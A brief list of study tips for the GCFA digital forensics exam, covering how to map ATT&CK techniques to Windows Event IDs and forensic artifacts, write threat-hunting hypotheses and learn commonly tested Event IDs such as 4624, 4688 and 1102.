Build ATT&CK technique-to-evidence mappings: For the most common techniques (PowerShell, WMI, LSASS dumping, log clearing, lateral movement), know the specific Event IDs and forensic artifacts. This links Domain 1 (IR) to Domains 2-4 (Windows forensics, memory analysis, timeline).
Practice hunt hypothesis writing: Take any ATT&CK technique and write a hunting hypothesis for it. Then identify what data sources you'd query and what anomalies you'd look for. This is core to GCFA practical thinking.
Learn Event IDs 4624, 4625, 4648, 4688, 4698, 4702, 7045, 1102, 104: These are the most commonly tested Event IDs in GCFA scenarios. Know what each one means, which log it appears in, and what attacker activity it may indicate.